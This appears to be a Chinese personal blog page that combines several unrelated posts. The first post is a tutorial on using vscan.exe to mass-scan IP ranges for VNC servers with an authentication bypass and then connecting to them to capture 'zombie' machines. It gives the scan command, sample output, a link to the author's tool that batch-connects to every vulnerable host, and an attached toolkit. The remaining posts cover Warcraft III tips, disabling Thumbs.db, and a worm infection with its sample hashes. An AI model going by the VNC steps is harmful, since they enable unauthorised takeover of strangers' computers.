VNC(virtual network computing),是一种由AT&T开发的远程控制的技术,简单来说,就是将远端的图形桌面显示到本地终端.有点类似微软的3389.

VNC漏洞利用工具包括两部分vscan.exe(在一些工具包中也叫VNC_bypauth.exe),主要用来扫描有vnc漏洞的主机.还有一个VNCLink.exe,这个也就是VNC Viewer,是一款vnc连接工具,类似3389.

国外很多的计算机都开启了vnc服务,我们可以利用vnc漏洞来进行抓肉鸡.

vscan的使用格式如下

vscan.exe -i StarIP-EndIP -p Port  -vnc -Option

例子:

vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -vv

扫描完毕vscan会将结果保存在VNC_pauth.txt文件中.

文件内容如下

[php]—————————————————————————-
COMMAND: vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -w

192.168.139.170  :5900     connection closed
192.168.139.170  :5900     vnc4:banned
192.168.139.23   :5900     vnc4:patched
192.168.139.122  :5900     vnc4:patched
192.168.139.188  :5900     vnc4:patched
192.168.139.75   :5900     vnc4:banned
192.168.139.160  :5900     vnc4:VULNERABLE
192.168.139.181  :5900     vnc4:banned
192.168.139.251  :5900     vnc4:patched
192.168.139.89   :5900     vnc4:banned
192.168.139.110  :5900     vnc4:patched

Scan complete
——————————————–[heapoverflow.com 2004-2005]—-[/php]

类似192.168.139.160  :5900     vnc4:VULNERABLE这样后面有vnc4:VULNERABLE的就是可以连接的主机了,可以用VNCLink.exe直接连接.

如果连接上去的时候对方没有锁定计算机,那么恭喜你,你已经拿到一台肉鸡了.

因为扫描后要手动连接主机去验证主机是否可以控制,那么不停的连接就会变的很麻烦,这里给大家提供一个我自己写的工具来自动筛选可连接ip并且生成批处理程序自动进行连接,

工具地址 http://www.foolbird.net/online/vnc/

将你的vnc viewer路径填上,再将VNC_pauth.txt的内容粘贴到文本框中,然后进行生成,当出现结果页的时候查看网页的源代码,然后以.bat格式保存就可以了.

然后就可以用所生成批处理文件来进行自动连接了.

附件:vnc.rar(143206 Byte)

很多时候我们需要一边游戏一边聊天,那么就要在游戏和桌面间不停的切换,如果使用窗口化运行游戏,一切就会更加方便.

首先你需要在桌面创建一个魔兽争霸3冰封王座的快捷方式,如果已经有了就不用再创建了,然后右键点快捷方式,点击属性.

在你的魔兽争霸路径.exe”之后加上” -window”,注意前面要加一个空格,而且要在双引号之后加,然后确定.

在浩方里使用窗口化模式运行魔兽争霸3冰封王座:

先登陆浩方对战平台,进入设置页面,在左面的游戏列表中找到寒冰王座,单击.

右侧出现游戏运行的参数选项,在”2.游戏运行参数”中填”-window”,确定.

搞定.

今天有发现硬盘里有Thumbs.db文件了,删掉之后过了不久又出现了,以前也发现过,以为是病毒呢,但现在装了正版金山,怎么还会出现呢?

到网上一番搜索之后发现Thumbs.db并不是病毒.

Thumbs.db只是一个图片索引文件，可以加速你用缩略图方式查看图片,会随着文件夹的图片的增多也体积增大.本来只要你硬盘够大,这个文件也没什么影响,但很多朋友在上传东西到服务器时,往往会不小心把这个文件也传了上去,有点不好.

从Windows 98开始,系统增加了图片预览功能,保存了图片的文件夹下会产生一个名为”Thumbs.db”的文件,这个文件会随着图片文件的增加而膨胀.奇怪的是,这个文件被删除后下次预览图片时它又会自动生成.

下面教大家如何让系统不生成Thumbs.db.

在”控制面板”中打开”文件夹选项”,在”文件夹选项”对话框中切换到”查看”标签,在”不缓存缩略图”复选框前打上”√”,再点击”确定”按钮退出即可.

好,现在我们可以确保不会在生成Thumbs.db了,但是已经生成的Thumbs.db是不会自动消失的,需要手动将硬盘中的Thumbs.db全部删掉.

打开资源管理器或者我的电脑,点击工具栏上的”搜索”按钮或按快捷键Ctrl+F,在我的电脑范围内搜索Thumbs.db,按立即搜索,

等到出现搜索结果之后Ctrl+A选中全部文件,删除就OK了.

可能很多人还不知道如何在魔兽争霸III冰封王座中如何使用中文名字,今天把操作步骤写给大家.

其实很简单,先随便起个中文名字,进入局域网,随便选一个地图建立游戏.

在下面聊天用的输入框中用中文输入你要起的中文名字,比如说我们要起名叫 “默默”,那么在输入框中打”默默”

注意这个时候光标是在默默后面的,然后按住shift,按住的同时按方向键左,这个时候我们打的中文就被选中了,

然后用windows的复制快捷键ctrl+c,

然后退出房间,在输入名字的地方再按windows的粘贴快捷键ctrl+v,

好了,我们的名字已经是中文了,可以去游戏了.

刚刚终于找到了前几个月困惑我很久的元凶,在学校的时候一直无法用双击打开硬盘,而且无法查看隐藏文件.前几天装了金山把tel.xls.exe给干掉了,但我很奇怪在学校的时候本子没有上网是怎么感染上病毒的,今天终于知道了,问题出在我的手机上.

刚刚查了下资料

病毒名称：Virus.Win32.Dzan.a（Kaspersky）

　　　　　 清除Virus.Win32.Dzan.a后：Trojan.Win32.VB.atg（Kaspersky）

病毒

别名：Worm.[**Suse**](http://wiki.ccw.com.cn/SUSE)r.a（[**瑞星**](http://topic.ccw.com.cn/corpCenter/139.html)）

病毒大小：110,592 字节

　　　　　 清除Virus.Win32.Dzan.a后：45,056 字节

加壳方式：N/A

样本MD5：3dc040cb3a352a8577f44a1ff8ef8ca8

样本SHA1：acf12d3a843126cc98efd9f8e77c1cf14b027a70

发现时间：2006.11

更新时间：2006.11

关联病毒：

传播方式：通过恶意网页传播，其它木马下载，可移动存储设备（如U盘、MP3、移动硬盘）、

 

最后找到了专杀工具把它彻底干掉了.

附件:tel_xls_exe.rar(22444 Byte)